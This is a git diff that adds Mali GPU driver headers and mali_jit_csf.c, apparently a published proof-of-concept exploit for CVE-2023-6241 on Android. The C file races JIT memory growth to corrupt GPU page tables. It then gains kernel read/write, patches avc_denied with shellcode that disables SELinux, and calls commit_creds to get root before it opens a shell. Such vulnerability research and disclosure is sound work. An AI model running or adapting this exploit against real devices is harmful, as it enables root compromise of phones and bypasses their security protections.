kernel event + * @BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR: Notification with GPU fatal + * error + * @BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP: Notification with dumping cpu + * queue + * @BASE_CSF_NOTIFICATION_COUNT: The number of notification type + * + * This type is used for &struct_base_csf_notification.type. 
+ */ +enum base_csf_notification_type { + BASE_CSF_NOTIFICATION_EVENT = 0, + BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR, + BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP, + BASE_CSF_NOTIFICATION_COUNT +}; + +/** + * struct base_csf_notification - Event or error notification + * + * @type: Notification type of @base_csf_notification_type + * @padding: Padding for 64bit boundary + * @payload: Input Payload + * @payload.align: To fit the struct into a 64-byte cache line + * @payload.csg_error: CSG error + * @payload.csg_error.handle: Handle of GPU command queue group associated with + * fatal error + * @payload.csg_error.padding: Padding + * @payload.csg_error.error: Unrecoverable fault error + * + */ +struct base_csf_notification { + __u8 type; + __u8 padding[7]; + union { + struct { + __u8 handle; + __u8 padding[7]; + struct base_gpu_queue_group_error error; + } csg_error; + + __u8 align[56]; + } payload; +}; + +/** + * struct mali_base_gpu_core_props - GPU core props info + * + * @product_id: Pro specific value. + * @version_status: Status of the GPU release. No defined values, but starts at + * 0 and increases by one for each release status (alpha, beta, EAC, etc.). + * 4 bit values (0-15). + * @minor_revision: Minor release number of the GPU. "P" part of an "RnPn" + * release number. + * 8 bit values (0-255). + * @major_revision: Major release number of the GPU. "R" part of an "RnPn" + * release number. + * 4 bit values (0-15). + * @padding: padding to align to 8-byte + * @gpu_freq_khz_max: The maximum GPU frequency. Reported to applications by + * clGetDeviceInfo() + * @log2_program_counter_size: Size of the shader program counter, in bits. + * @texture_features: TEXTURE_FEATURES_x registers, as exposed by the GPU. This + * is a bitpattern where a set bit indicates that the format is supported. + * Before using a texture format, it is recommended that the corresponding + * bit be checked. + * @gpu_available_memory_size: Theoretical maximum memory available to the GPU. + * It is unlikely that a client will be able to allocate all of this memory + * for their own purposes, but this at least provides an upper bound on the + * memory available to the GPU. + * This is required for OpenCL's clGetDeviceInfo() call when + * CL_DEVICE_GLOBAL_MEM_SIZE is requested, for OpenCL GPU devices. The + * client will not be expecting to allocate anywhere near this value. + */ +struct mali_base_gpu_core_props { + __u32 product_id; + __u16 version_status; + __u16 minor_revision; + __u16 major_revision; + __u16 padding; + __u32 gpu_freq_khz_max; + __u32 log2_program_counter_size; + __u32 texture_features[BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS]; + __u64 gpu_available_memory_size; +}; + +#endif /* _UAPI_BASE_CSF_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h new file mode 100644 index 0000000..c0b4d50 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h @@ -0,0 +1,287 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2010-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. 
+ * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +/* + * Base structures shared with the kernel. + */ + +#ifndef _UAPI_BASE_KERNEL_H_ +#define _UAPI_BASE_KERNEL_H_ + +#include + +#define BASE_MAX_COHERENT_GROUPS 16 + +/* Physical memory group ID for normal usage. + */ +#define BASE_MEM_GROUP_DEFAULT (0) + +/* Physical memory group ID for explicit SLC allocations. + */ +#define BASE_MEM_GROUP_PIXEL_SLC_EXPLICIT (2) + +/* Number of physical memory groups. + */ +#define BASE_MEM_GROUP_COUNT (16) + +/** + * typedef base_mem_alloc_flags - Memory allocation, access/hint flags. + * + * A combination of MEM_PROT/MEM_HINT flags must be passed to each allocator + * in order to determine the best cache policy. Some combinations are + * of course invalid (e.g. MEM_PROT_CPU_WR | MEM_HINT_CPU_RD), + * which defines a write-only region on the CPU side, which is + * heavily read by the CPU... + * Other flags are only meaningful to a particular allocator. + * More flags can be added to this list, as long as they don't clash + * (see BASE_MEM_FLAGS_NR_BITS for the number of the first free bit). + */ +typedef __u32 base_mem_alloc_flags; + + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +/** + * enum base_mem_import_type - Memory types supported by @a base_mem_import + * + * @BASE_MEM_IMPORT_TYPE_INVALID: Invalid type + * @BASE_MEM_IMPORT_TYPE_UMM: UMM import. Handle type is a file descriptor (int) + * @BASE_MEM_IMPORT_TYPE_USER_BUFFER: User buffer import. Handle is a + * base_mem_import_user_buffer + * + * Each type defines what the supported handle type is. + * + * If any new type is added here ARM must be contacted + * to allocate a numeric value for it. + * Do not just add a new type without synchronizing with ARM + * as future releases from ARM might include other new types + * which could clash with your custom types. + */ +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. + */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/* + * struct base_fence - Cross-device synchronisation fence. + * + * A fence is used to signal when the GPU has finished accessing a resource that + * may be shared with other devices, and also to delay work done asynchronously + * by the GPU until other devices have finished accessing a shared resource. + */ +struct base_fence { + struct { + int fd; + int stream_fd; + } basep; +}; + +/** + * struct base_mem_aliasing_info - Memory aliasing info + * + * @handle: Handle to alias, can be BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * @offset: Offset within the handle to start aliasing from, in pages. + * Not used with BASE_MEM_WRITE_ALLOC_PAGES_HANDLE. + * @length: Length to alias, in pages. 
For BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * specifies the number of times the special page is needed. + * + * Describes a memory handle to be aliased. + * A subset of the handle can be chosen for aliasing, given an offset and a + * length. + * A special handle BASE_MEM_WRITE_ALLOC_PAGES_HANDLE is used to represent a + * region where a special page is mapped with a write-alloc cache setup, + * typically used when the write result of the GPU isn't needed, but the GPU + * must write anyway. + * + * Offset and length are specified in pages. + * Offset must be within the size of the handle. + * Offset+length must not overrun the size of the handle. + */ +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +/* Maximum percentage of just-in-time memory allocation trimming to perform + * on free. + */ +#define BASE_JIT_MAX_TRIM_LEVEL (100) + +/* Maximum number of concurrent just-in-time memory allocations. + */ +#define BASE_JIT_ALLOC_COUNT (255) + +/* base_jit_alloc_info in use for kernel driver versions 10.2 to early 11.5 + * + * jit_version is 1 + * + * Due to the lack of padding specified, user clients between 32 and 64-bit + * may have assumed a different size of the struct + * + * An array of structures was not supported + */ +struct base_jit_alloc_info_10_2 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; +}; + +/* base_jit_alloc_info introduced by kernel driver version 11.5, and in use up + * to 11.19 + * + * This structure had a number of modifications during and after kernel driver + * version 11.5, but remains size-compatible throughout its version history, and + * with earlier variants compatible with future variants by requiring + * zero-initialization to the unused space in the structure. + * + * jit_version is 2 + * + * Kernel driver version history: + * 11.5: Initial introduction with 'usage_id' and padding[5]. All padding bytes + * must be zero. Kbase minor version was not incremented, so some + * versions of 11.5 do not have this change. + * 11.5: Added 'bin_id' and 'max_allocations', replacing 2 padding bytes (Kbase + * minor version not incremented) + * 11.6: Added 'flags', replacing 1 padding byte + * 11.10: Arrays of this structure are supported + */ +struct base_jit_alloc_info_11_5 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; +}; + +/** + * struct base_jit_alloc_info - Structure which describes a JIT allocation + * request. + * @gpu_alloc_addr: The GPU virtual address to write the JIT + * allocated GPU virtual address to. + * @va_pages: The minimum number of virtual pages required. + * @commit_pages: The minimum number of physical pages which + * should back the allocation. + * @extension: Granularity of physical pages to grow the + * allocation by during a fault. + * @id: Unique ID provided by the caller, this is used + * to pair allocation and free requests. + * Zero is not a valid value. + * @bin_id: The JIT allocation bin, used in conjunction with + * @max_allocations to limit the number of each + * type of JIT allocation. + * @max_allocations: The maximum number of allocations allowed within + * the bin specified by @bin_id. Should be the same + * for all allocations within the same bin. 
+ * @flags: flags specifying the special requirements for + * the JIT allocation, see + * %BASE_JIT_ALLOC_VALID_FLAGS + * @padding: Expansion space - should be initialised to zero + * @usage_id: A hint about which allocation should be reused. + * The kernel should attempt to use a previous + * allocation with the same usage_id + * @heap_info_gpu_addr: Pointer to an object in GPU memory describing + * the actual usage of the region. + * + * jit_version is 3. + * + * When modifications are made to this structure, it is still compatible with + * jit_version 3 when: a) the size is unchanged, and b) new members only + * replace the padding bytes. + * + * Previous jit_version history: + * jit_version == 1, refer to &base_jit_alloc_info_10_2 + * jit_version == 2, refer to &base_jit_alloc_info_11_5 + * + * Kbase version history: + * 11.20: added @heap_info_gpu_addr + */ +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +enum base_external_resource_access { + BASE_EXT_RES_ACCESS_SHARED, + BASE_EXT_RES_ACCESS_EXCLUSIVE +}; + +struct base_external_resource { + __u64 ext_resource; +}; + +/** + * BASE_EXT_RES_COUNT_MAX - The maximum number of external resources + * which can be mapped/unmapped in a single request. + */ +#define BASE_EXT_RES_COUNT_MAX 10 + +/** + * struct base_external_resource_list - Structure which describes a list of + * external resources. + * @count: The number of resources. + * @ext_res: Array of external resources which is + * sized at allocation time. + */ +struct base_external_resource_list { + __u64 count; + struct base_external_resource ext_res[1]; +}; + +#endif /* _UAPI_BASE_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c new file mode 100644 index 0000000..724d031 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_jit_csf.c @@ -0,0 +1,435 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "stdbool.h" +#include +#include + +//From https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17 +#include "CL/cl.h" +#include "mali_kbase_ioctl.h" +#include "mali_base_csf_kernel.h" +#include "mali_base_kernel.h" +#include "mem_read_write.h" +#include "mempool_utils.h" +#include "firmware_offsets.h" + +#define MALI "/dev/mali0" + +//#define GROW_SIZE 0x2000 + +#define GROW_SIZE (0x2000 - 10) + +#define FREED_NUM 1 + +#define JIT_SIZE 0x23d0 + +#define FAULT_SIZE 0x300 + +#define PTE_PAGES 0x200 + +#define PTE_SIZE (PTE_PAGES << 12) + +#define TEST_VAL 0x42424242 + +#define THRESHOLD 0x2300 + +#define REUSE_REG_SIZE 0x100 + +#define RESERVED_SIZE 32 + +#define TOTAL_RESERVED_SIZE 1024 + +static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; + +uint64_t reused_regions[REUSE_REG_SIZE] = {0}; + +static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2311; + +static uint64_t avc_deny = AVC_DENY_2311; + +/* +Overwriting SELinux to permissive + strb wzr, [x0] + mov x0, #0 + ret +*/ +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; + +static uint32_t root_code[8] = {0}; + +static int open_dev(char* name) { + int fd = open(name, O_RDWR); + if (fd == -1) { + err(1, "cannot open %s\n", name); + } + return fd; +} + +int find_mali_fd() { + int test_fd = open("/dev/null", O_RDWR); + char 
file_path[256]; + char proc_string[256]; + for (int i = 3; i < test_fd; i++) { + sprintf(proc_string, "/proc/self/fd/%d", i); + if(readlink(proc_string, file_path, 256) > 0) { + if (strcmp(file_path, MALI) == 0) { + close(test_fd); + return i; + } + } + } + close(test_fd); + return -1; +} + +void setup_mali(int fd, int group_id) { + + struct kbase_ioctl_version_check param = {0}; + if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { + LOG("major %d\n", param.major); + err(1, "version check failed\n"); + } + + struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { + err(1, "set flags failed\n"); + } +} + +void* setup_tracking_page(int fd) { + void* region = mmap(NULL, 0x1000, 0, MAP_SHARED, fd, BASE_MEM_MAP_TRACKING_HANDLE); + if (region == MAP_FAILED) { + err(1, "setup tracking page failed"); + } + return region; +} + +void mem_query(int fd, union kbase_ioctl_mem_query* query) { + if (ioctl(fd, KBASE_IOCTL_MEM_QUERY, query) < 0) { + err(1, "mem_query failed\n"); + } +} + +void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) { + struct kbase_ioctl_mem_commit commit = {.gpu_addr = gpu_addr, pages = pages}; + if (ioctl(fd, KBASE_IOCTL_MEM_COMMIT, &commit) < 0) { + LOG("commit failed\n"); + } +} + +uint64_t get_mem_size(int fd, uint64_t gpu_addr) { + union kbase_ioctl_mem_query query = {0}; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + query.in.gpu_addr = gpu_addr; + mem_query(fd, &query); + return query.out.value; +} + +void queue_register(int fd, uint64_t queue_addr, uint32_t queue_pages) { + struct kbase_ioctl_cs_queue_register reg = {0}; + reg.buffer_gpu_addr = queue_addr; + reg.buffer_size = queue_pages; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_REGISTER, ®) < 0) { + err(1, "register queue failed\n"); + } +} + +uint64_t queue_bind(int fd, uint64_t queue_addr, uint8_t group_handle, uint8_t csi_index) { + union kbase_ioctl_cs_queue_bind bind = {0}; + bind.in.buffer_gpu_addr = queue_addr; + bind.in.group_handle = group_handle; + bind.in.csi_index = csi_index; + if (ioctl(fd, KBASE_IOCTL_CS_QUEUE_BIND, &bind) < 0) { + err(1, "bind queue failed\n"); + } + return bind.out.mmap_handle; +} + +uint8_t kcpu_queue_new(int fd) { + struct kbase_ioctl_kcpu_queue_new queue_new = {0}; + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_CREATE, &queue_new) < 0) { + err(1, "kcpu queue create failed\n"); + } + return queue_new.id; +} + +void jit_init(int fd, uint64_t va_pages, uint64_t trim_level, int group_id) { + struct kbase_ioctl_mem_jit_init init = {0}; + init.va_pages = va_pages; + init.max_allocations = 255; + init.trim_level = trim_level; + init.group_id = group_id; + init.phys_pages = va_pages; + + if (ioctl(fd, KBASE_IOCTL_MEM_JIT_INIT, &init) < 0) { + err(1, "jit init failed\n"); + } +} + +uint64_t jit_allocate(int fd, uint8_t queue_id, uint8_t jit_id, uint64_t va_pages, uint64_t commit_pages, uint8_t bin_id, uint16_t usage_id, uint64_t gpu_alloc_addr) { + *((uint64_t*)gpu_alloc_addr) = 0; + struct base_jit_alloc_info info = {0}; + info.id = jit_id; + info.gpu_alloc_addr = gpu_alloc_addr; + info.va_pages = va_pages; + info.commit_pages = commit_pages; + info.extension = 1; + info.bin_id = bin_id; + info.usage_id = usage_id; + + struct base_kcpu_command_jit_alloc_info jit_alloc_info = {0}; + jit_alloc_info.info = (uint64_t)(&info); + jit_alloc_info.count = 1; + struct base_kcpu_command cmd = {0}; + cmd.info.jit_alloc = jit_alloc_info; + cmd.type = BASE_KCPU_COMMAND_TYPE_JIT_ALLOC; + struct kbase_ioctl_kcpu_queue_enqueue enq = {0}; + enq.id = 
queue_id; + enq.nr_commands = 1; + enq.addr = (uint64_t)(&cmd); + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &enq) < 0) { + err(1, "jit allocate failed\n"); + } + volatile uint64_t ret = *((uint64_t*)gpu_alloc_addr); + while (ret == 0) { + ret = *((uint64_t*)gpu_alloc_addr); + } + return ret; +} + +void jit_free(int fd, uint8_t queue_id, uint8_t jit_id) { + uint8_t free_id = jit_id; + struct base_kcpu_command_jit_free_info info = {0}; + info.ids = (uint64_t)(&free_id); + info.count = 1; + struct base_kcpu_command cmd = {0}; + cmd.info.jit_free = info; + cmd.type = BASE_KCPU_COMMAND_TYPE_JIT_FREE; + struct kbase_ioctl_kcpu_queue_enqueue enq = {0}; + enq.id = queue_id; + enq.nr_commands = 1; + enq.addr = (uint64_t)(&cmd); + if (ioctl(fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &enq) < 0) { + err(1, "jit free failed\n"); + } +} + +void* jit_grow(void* args) { + uint64_t* arguments = (uint64_t*)args; + int mali_fd = arguments[0]; + int qid = arguments[1]; + int jit_id = arguments[2]; + uint64_t gpu_alloc_addr = arguments[3]; + uint64_t addr = jit_allocate(mali_fd, qid, jit_id, JIT_SIZE, GROW_SIZE, 1, 1, gpu_alloc_addr); + LOG("jit_grow addr %lx\n", addr); + return NULL; +} + +void create_reuse_regions(int mali_fd, uint64_t* reuse_regions, size_t size) { + for (int i = 0; i < size; i++) { + reuse_regions[i] = (uint64_t)map_gpu(mali_fd, 1, 1, false, 0); + memset((void*)(reused_regions[i]), 0, 0x1000); + } +} + +uint64_t find_reused_page(uint64_t* reuse_regions, size_t size) { + for (int i = 0; i < size; i++) { + uint64_t* region_start = (uint64_t*)(reused_regions[i]); + for (int j = 0; j < 0x1000/sizeof(uint64_t); j++) { + if (region_start[j] == TEST_VAL) { + LOG("found reused page %lx, %d\n", (uint64_t)region_start, j); + return (uint64_t)region_start; + } + } + } + return -1; +} + +int find_pgd(int mali_fd, uint64_t gpu_addr, cl_command_queue command_queue, struct rw_mem_kernel* kernel, uint64_t* out) { + int ret = -1; + uint64_t read_addr = gpu_addr; + for (int i = 0; i < 0x1000/8; i++) { + uint64_t entry = read_from(mali_fd, &read_addr, command_queue, kernel); + read_addr += 8; + if ((entry & 0x443) == 0x443) { + *out = entry; + return i; + } + } + return ret; +} + +void write_shellcode(int mali_fd, uint64_t pgd, uint64_t* reserved, cl_command_queue command_queue, struct rw_mem_kernel* kernel, struct rw_mem_kernel* kernel32) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + uint64_t overwrite_index = pgd + OVERWRITE_INDEX * sizeof(uint64_t); + write_to(mali_fd, &overwrite_index, &avc_deny_addr, command_queue, kernel); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, &overwrite_index, &sel_read_enforce_addr, command_queue, kernel); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t), RESERVED_SIZE, command_queue, kernel32); +} + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + fixup_root_shell(INIT_CRED_2311, COMMIT_CREDS_2311, SEL_READ_ENFORCE_2311, 
ADD_INIT_2311, ADD_COMMIT_2311, &(root_code[0])); + cl_platform_id platform_id = NULL; + cl_device_id device_id = NULL; + cl_uint ret_num_devices; + cl_uint ret_num_platforms; + + cl_int ret = clGetPlatformIDs(1, &platform_id, &ret_num_platforms); + if (ret != CL_SUCCESS) { + err(1, "fail to get platform\n"); + } + int mali_fd = find_mali_fd(); + LOG("mali_fd %d\n", mali_fd); + + uint8_t qid = kcpu_queue_new(mali_fd); + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + memset(gpu_alloc_addr, 0, 0x1000); + + uint64_t test_jit_id = 1; + uint64_t test_jit_addr = jit_allocate(mali_fd, qid, test_jit_id, 1, 0, 0, 0, (uint64_t)gpu_alloc_addr); + uint64_t remainder = test_jit_addr % PTE_SIZE; + if (remainder) { + test_jit_id++; + jit_allocate(mali_fd, qid, test_jit_id, (PTE_PAGES + 1 - (remainder >> 12)), 0, 0, 0, (uint64_t)gpu_alloc_addr); + } + + uint64_t corrupted_jit_id = test_jit_id + 1; + uint64_t second_jit_id = corrupted_jit_id + 1; + + uint64_t corrupted_jit_addr = jit_allocate(mali_fd, qid, corrupted_jit_id, JIT_SIZE, 1, 1, 1, (uint64_t)gpu_alloc_addr); + + LOG("corrupted_jit_addr %lx\n", corrupted_jit_addr); + + jit_free(mali_fd, qid, corrupted_jit_id); + + ret = clGetDeviceIDs( platform_id, CL_DEVICE_TYPE_DEFAULT, 1, + &device_id, &ret_num_devices); + if (ret != CL_SUCCESS) { + err(1, "fail to get Device ID\n"); + } + + cl_context context = clCreateContext( NULL, 1, &device_id, NULL, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create context\n"); + } + + cl_command_queue command_queue = clCreateCommandQueueWithProperties(context, device_id, NULL, &ret); + if (ret != CL_SUCCESS) { + err(1, "fail to create command_queue\n"); + } + + + uint64_t write_addr = corrupted_jit_addr + FAULT_SIZE * 0x1000; + uint64_t value = 32; + uint64_t write = 1; + + struct rw_mem_kernel kernel = create_rw_mem(context, &device_id, true); + struct rw_mem_kernel kernel32 = create_rw_mem(context, &device_id, false); + + ret = clEnqueueWriteBuffer(command_queue, kernel.va, CL_TRUE, 0, sizeof(uint64_t), &write_addr, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel.in_out, CL_TRUE, 0, sizeof(uint64_t), &value, 0, NULL, NULL); + ret = clEnqueueWriteBuffer(command_queue, kernel.flag, CL_TRUE, 0, sizeof(uint64_t), &write, 0, NULL, NULL); + + if (ret != CL_SUCCESS) { + err(1, "Failed to write to buffer\n"); + } + + size_t global_work_size = 1; + size_t local_work_size = 1; + LOG("queue kernel\n"); + pthread_t thread; + uint64_t args[4]; + args[0] = mali_fd; + args[1] = qid; + args[2] = corrupted_jit_id; + args[3] = (uint64_t)gpu_alloc_addr; + + pthread_create(&thread, NULL, &jit_grow, (void*)&(args[0])); + ret = clEnqueueNDRangeKernel(command_queue, kernel.kernel, 1, NULL, &global_work_size, &local_work_size, 0, NULL, NULL); + if (ret != CL_SUCCESS) { + err(1, "Failed to enqueue kernel\n"); + } + usleep(10000); + ret = clFlush(command_queue); + + pthread_join(thread, NULL); + uint64_t region_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Size after grow: %lx\n", region_size); + + write_addr = corrupted_jit_addr + (FAULT_SIZE + GROW_SIZE + 0xd0) * 0x1000; + write_to(mali_fd, &write_addr, &value, command_queue, &kernel); + + uint64_t final_grow_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Final grow size: %lx\n", final_grow_size); + + uint64_t keep_alive_jit_addr = jit_allocate(mali_fd, qid, second_jit_id + 1, 10, 10, 0, 0, (uint64_t)gpu_alloc_addr); + LOG("keep alive jit_addr %lx\n", keep_alive_jit_addr); + + jit_free(mali_fd, qid, corrupted_jit_id); + 
usleep(10000); + uint64_t trimmed_size = get_mem_size(mali_fd, corrupted_jit_addr); + LOG("Size after free: %lx, trim_level %lu\n", trimmed_size, 100 - (trimmed_size * 100)/final_grow_size); + + uint64_t reclaim_addr = jit_allocate(mali_fd, qid, corrupted_jit_id, JIT_SIZE, trimmed_size, 1, 1, (uint64_t)gpu_alloc_addr); + if (reclaim_addr != corrupted_jit_addr) { + err(1, "Inconsistent address when reclaiming freed jit region %lx %lx\n", reclaim_addr, corrupted_jit_addr); + } + + create_reuse_regions(mali_fd, &(reused_regions[0]), REUSE_REG_SIZE); + + value = TEST_VAL; + write_addr = corrupted_jit_addr + (THRESHOLD) * 0x1000; + LOG("writing to gpu_va %lx\n", write_addr); + write_to(mali_fd, &write_addr, &value, command_queue, &kernel); + + uint64_t reused_addr = find_reused_page(&(reused_regions[0]), REUSE_REG_SIZE); + if (reused_addr == -1) { + err(1, "Cannot find reused page\n"); + } + reserve_pages(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + + mem_commit(mali_fd, reused_addr, 0); + map_reserved(mali_fd, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + + uint64_t entry = 0; + int res = find_pgd(mali_fd, write_addr, command_queue, &kernel, &entry); + if (res == -1) { + err(1, "Cannot find page table entry\n"); + } + LOG("pgd entry found at index %d %lx\n", res, entry); + + write_shellcode(mali_fd, write_addr, &(reserved[0]), command_queue, &kernel, &kernel32); + run_enforce(); + cleanup(mali_fd, write_addr, command_queue, &kernel); + + ret = clFinish(command_queue); + releaseKernel(&kernel); + releaseKernel(&kernel32); + ret = clReleaseCommandQueue(command_queue); + ret = clReleaseContext(context); + system("sh"); + } diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h new file mode 100644 index 0000000..91249ca --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_kbase_csf_ioctl.h @@ -0,0 +1,556 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_CSF_IOCTL_H_ +#define _UAPI_KBASE_CSF_IOCTL_H_ + +#include +#include + +/* + * 1.0: + * - CSF IOCTL header separated from JM + * 1.1: + * - Add a new priority level BASE_QUEUE_GROUP_PRIORITY_REALTIME + * - Add ioctl 54: This controls the priority setting. 
+ * 1.2: + * - Add new CSF GPU_FEATURES register into the property structure + * returned by KBASE_IOCTL_GET_GPUPROPS + * 1.3: + * - Add __u32 group_uid member to + * &struct_kbase_ioctl_cs_queue_group_create.out + * 1.4: + * - Replace padding in kbase_ioctl_cs_get_glb_iface with + * instr_features member of same size + * 1.5: + * - Add ioctl 40: kbase_ioctl_cs_queue_register_ex, this is a new + * queue registration call with extended format for supporting CS + * trace configurations with CSF trace_command. + * 1.6: + * - Added new HW performance counters interface to all GPUs. + * 1.7: + * - Added reserved field to QUEUE_GROUP_CREATE ioctl for future use + * 1.8: + * - Removed Kernel legacy HWC interface + * 1.9: + * - Reorganization of GPU-VA memory zones, including addition of + * FIXED_VA zone and auto-initialization of EXEC_VA zone. + * - Added new Base memory allocation interface + * 1.10: + * - First release of new HW performance counters interface. + * 1.11: + * - Dummy model (no mali) backend will now clear HWC values after each sample + * 1.12: + * - Added support for incremental rendering flag in CSG create call + * 1.13: + * - Added ioctl to query a register of USER page. + * 1.14: + * - Added support for passing down the buffer descriptor VA in tiler heap init + */ + +#define BASE_UK_VERSION_MAJOR 1 +#define BASE_UK_VERSION_MINOR 14 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + +/** + * struct kbase_ioctl_cs_queue_register - Register a GPU command queue with the + * base back-end + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * + * Note: There is an identical sub-section in kbase_ioctl_cs_queue_register_ex. + * Any change of this struct should also be mirrored to the latter. 
